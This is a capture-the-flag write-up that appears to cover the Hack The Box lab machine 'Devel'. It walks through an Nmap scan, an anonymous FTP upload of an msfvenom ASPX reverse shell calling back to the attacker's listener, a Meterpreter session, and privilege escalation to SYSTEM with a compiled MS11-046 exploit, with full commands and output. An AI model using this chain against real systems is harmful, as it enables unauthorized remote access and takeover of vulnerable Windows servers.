I first started by running Nmap against the machine.
# Nmap 7.80 scan initiated Tue Sep 15 15:54:13 2020 as: nmap -sV -sC -O -oN scan -p- 10.10.10.5 Nmap scan report for 10.10.10.5 Host is up (0.023s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM <DIR> aspnet_client | 03-17-17 05:37PM 689 iisstart.htm | 09-19-20 03:04AM 2864 shell1.aspx |_03-17-17 05:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Sep 15 15:56:25 2020 -- 1 IP address (1 host up) scanned in 132.34 seconds
From this output we can see that FTP and HTTP are both running, with HTTP being served by IIS 7.5. We can also see that FTP allows guest logins.
I tried connecting to the FTP server and uploaded a txt file which worked successfully. I was also able to browse to this file via HTTP. As file uploads were possible I generated an ASPX reverse shell using msfvenom to upload to the machine.
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=10.10.14.27 lport=2600 -f aspx -o now.aspx
I then uploaded the now.aspx file to the devel machine:
root@kali:/home/kali/Documents/devel# ftp 10.10.10.5 Connected to 10.10.10.5. 220 Microsoft FTP Service Name (10.10.10.5:kali): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put now.aspx local: now.aspx remote: now.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 2879 bytes sent in 0.00 secs (4.3860 MB/s)
Once the file uploaded. I started a handler on metasploit listening on port 2600 to capture the reverse shell created when now.aspx is executed.
msf5 exploit() > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > set lhost 10.10.14.27 lhost => 10.10.14.27 msf5 exploit(multi/handler) > set lport 2600 lport => 2600 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.27:2600
I then opened the web browser and browsed to http://10.10.10.5/now.aspx to execute the reverse shell. The output to the handler confirmed this worked successfully.
[*] Started reverse TCP handler on 10.10.14.27:2600 [*] Sending stage (176195 bytes) to 10.10.10.5 [*] Meterpreter session 10 opened (10.10.14.27:2600 -> 10.10.10.5:49165) at 2020-09-19 14:05:12 -0400 meterpreter > getuid Server username: IIS APPPOOL\Web meterpreter > systeminfo [-] Unknown command: systeminfo. meterpreter > sysinfo Computer : DEVEL OS : Windows 7 (6.1 Build 7600). Architecture : x86 System Language : el_GR Domain : HTB Logged On Users : 0 Meterpreter : x86/windows meterpreter >
From this output we can see it’s a Windows 7 32bit machine. After some trial and error I was able to identify that it had no hotfixes installed, and so decided to use the MS11-046 exploit to escalate privileges. The exploit was downloaded from exploitdb and compiled into a file which can be run on the devel machine:
root@kali:/home/kali/Downloads# i686-w64-mingw32-gcc 40564.c -o testing.exe -lws2_32
I then uploaded this compiled testing.exe to the devel machine using the meterpreter shell:
meterpreter > upload /home/kali/Documents/devel/testing.exe [*] uploading : /home/kali/Documents/devel/testing.exe -> testing.exe [*] Uploaded 291.76 KiB of 291.76 KiB (100.0%): /home/kali/Documents/devel/testing.exe -> testing.exe [*] uploaded : /home/kali/Documents/devel/testing.exe -> testing.exe meterpreter >
Once uploaded I migrated to a cmd shell and executed testing.exe:
meterpreter > shell Process 1196 created. Channel 2 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\Users\Public>whoami whoami iis apppool\web c:\Users\Public>testing.exe testing.exe c:\Windows\System32>whoami whoami nt authority\system c:\Windows\System32>
You can see from this output that it ran successfully an escalated the shell to a SYSTEM user. As a system user we are then able to read both the user and root flags.
c:\Windows\System32>cd /Users/babis/Desktop cd /Users/babis/Desktop c:\Users\babis\Desktop>more user.txt.txt more user.txt.txt [REDACTED] c:\Users\babis\Desktop>cd /users/Administrator/Desktop cd /users/Administrator/Desktop c:\Users\Administrator\Desktop>more root.txt.txt more root.txt.txt [REDACTED] c:\Users\Administrator\Desktop>